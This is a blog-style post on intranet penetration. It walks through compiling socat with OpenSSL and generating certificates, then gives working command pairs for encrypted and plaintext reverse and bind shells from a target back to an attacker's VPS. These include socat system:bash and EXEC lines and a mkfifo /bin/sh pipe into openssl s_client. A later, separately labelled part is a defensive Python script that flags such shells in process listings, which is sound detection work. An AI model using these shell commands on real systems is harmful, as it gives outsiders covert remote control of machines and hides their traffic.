Intranet Penetration – Encrypted Reverse Shell

Published 2022-11-14, 35 views


Build environment

# CentOS 8
yum install gcc-c++
yum install openssl-devel -y
yum install make -y
yum install readline-devel -y
wget http://www.dest-unreach.org/socat/download/socat-1.7.4.4.tar.gz
tar -zxvf socat-1.7.4.4.tar.gz
# a single & would background the cd; && runs configure inside the source directory
cd socat-1.7.4.4 && ./configure --enable-openssl-method
make
# Check the version
./socat -V

# Running the resulting binary on other systems
Ubuntu 18.04.6 LTS: works
CentOS Linux 8: works
CentOS Stream 9: error, "cannot execute binary file: Exec format error"
Ubuntu 20.04.5 LTS: error, "error while loading shared libraries: libreadline.so.7: cannot open shared object file"

# Official documentation
http://www.dest-unreach.org/socat/doc/socat-openssltunnel.html
http://www.dest-unreach.org/socat/doc/socat.html#ADDRESS_OPENSSL_LISTEN
http://www.dest-unreach.org/socat/doc/CHANGES

Certificate generation

FILENAME=filename
openssl genrsa -out $FILENAME.key 2048
openssl req -new -key $FILENAME.key -x509 -days 3653 -out $FILENAME.crt
# Set [Common Name] to the VPS's public IP
cat $FILENAME.key $FILENAME.crt > $FILENAME.pem

socat encrypted reverse shell

# Encrypted bind shell: interactive, but Ctrl+C exits the shell
vps: ./socat openssl-listen:4433,reuseaddr,cert=filename.pem,cafile=filename.crt system:bash,pty,stderr
target: ./socat readline openssl:x.x.x.x:4433,cert=filename.pem,cafile=filename.crt

# Encrypted reverse shell: interactive, but Ctrl+C exits the shell
vps: ./socat readline openssl-listen:4433,reuseaddr,cert=filename.pem,cafile=filename.crt
target: ./socat openssl:x.x.x.x:4433,cert=filename.pem,cafile=filename.crt system:bash,pty,stderr

# Reverse shell with a stable terminal (verify=0 disables certificate verification on both ends)
vps: socat OPENSSL-LISTEN:53,cert=encrypt.pem,verify=0 FILE:`tty`,raw,echo=0
target: socat OPENSSL:x.x.x.x:53,verify=0 EXEC:"bash -li",pty,stderr,sigint,setsid,sane
Captured traffic: encrypted.

socat unencrypted reverse shell

./socat file:tty,raw,echo=0 tcp-listen:4433
./socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:x.x.x.x:4433
Run the netstat command.
Captured traffic: plaintext.

openssl encrypted reverse shell

# Generate the SSL certificate key pair on the vps
openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes
# Listen on a port on the vps
openssl s_server -quiet -key key.pem -cert cert.pem -port 80
# On the target, connect back to the vps
mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect x.x.x.x:80 > /tmp/s; rm /tmp/s
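From the defender's side, the command lines in this post have a recognisable shape in a process listing. The following is an added example, not part of the original post: it scans constructed ps-style lines (pid, user, args; 203.0.113.5 is a documentation address, not a real VPS) and flags socat exec:/system: shells attached to a network address, plus non-interactive openssl s_client runs like the fifo-piped one above.

```python
import re
from typing import List, Optional, Tuple

# Constructed `ps -eo pid,user,args` lines modelled on the socat/openssl commands in this
# post (203.0.113.5 is a documentation address, not a real VPS); not captured from a host.
SAMPLE_PS = [
    "1201 root /usr/sbin/sshd -D",
    "2310 www  ./socat openssl:203.0.113.5:4433,cert=filename.pem,cafile=filename.crt system:bash,pty,stderr",
    "2311 www  socat OPENSSL:203.0.113.5:53,verify=0 EXEC:bash -li,pty,stderr,sigint,setsid,sane",
    "2412 www  ./socat exec:bash -li,pty,stderr,setsid,sigint,sane tcp:203.0.113.5:4433",
    "2520 www  openssl s_client -quiet -connect 203.0.113.5:80",
    "3001 app  socat TCP-LISTEN:8080,fork,reuseaddr TCP:10.0.0.7:80",
    "3100 dev  openssl s_client -connect example.com:443 -servername example.com",
]
PS_LINE = re.compile(r"^\s*(\d+)\s+(\S+)\s+(.*)$")
# exec:/system: address that spawns sh, bash, zsh or dash
SOCAT_SHELL = re.compile(r"\b(exec|system):['\"]?(?:/bin/)?(?:ba|z|da)?sh\b", re.I)
# network address: group 1 = transport, group 2 is set when it is a listener
SOCAT_NET = re.compile(r"\b(openssl|ssl|tcp[46]?)(-listen|-l)?:", re.I)

def classify(args: str) -> Optional[str]:
    """Return a reason if the command line looks like a socat/openssl shell, else None."""
    words = args.split()
    prog = words[0].rsplit("/", 1)[-1] if words else ""
    if prog == "socat":
        net = SOCAT_NET.search(args)
        if not (net and SOCAT_SHELL.search(args)):
            return None  # plain relays such as TCP-LISTEN -> TCP are not flagged
        kind = "bind" if net.group(2) else "reverse"
        tls = "TLS" if net.group(1).lower() in ("openssl", "ssl") else "plaintext"
        flags = [f for f in ("pty", "verify=0") if re.search(rf"\b{re.escape(f)}\b", args, re.I)]
        return f"socat {kind} shell over {tls}" + "".join(f", {f}" for f in flags)
    if prog == "openssl" and "s_client" in words and "-quiet" in words:
        # -quiet hides the banner; with a fifo on stdin/stdout it is the client half of the shell above
        return "openssl s_client -quiet (non-interactive TLS client)"
    return None

def find_suspicious(ps_lines: List[str]) -> List[Tuple[int, str, str]]:
    """Scan ps-style lines and return (pid, user, reason) for each hit."""
    hits = []
    for line in ps_lines:
        m = PS_LINE.match(line)
        reason = classify(m.group(3)) if m else None
        if reason:
            hits.append((int(m.group(1)), m.group(2), reason))
    return hits

if __name__ == "__main__":
    for pid, user, reason in find_suspicious(SAMPLE_PS):
        print(f"pid={pid} user={user}: {reason}")
```

Feed it real `ps -eo pid,user,args` output and treat a hit as a lead to confirm with `ss -tnp`, not as proof on its own.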

# Tips / references:

https://www.freebuf.com/articles/web/328278.html (Things about shells in penetration testing)

https://blog.maxkit.com.tw/2021/11/socat.html

https://thiscute.world/posts/socat-netcat/#3-%E6%8B%85%E5%BD%93%E4%B8%B4%E6%97%B6%E7%9A%84-web-%E6%9C%8D%E5%8A%A1%E5%99%A8

https://tw.coderbridge.com/questions/3534af0968df4025a68916df1c5de76c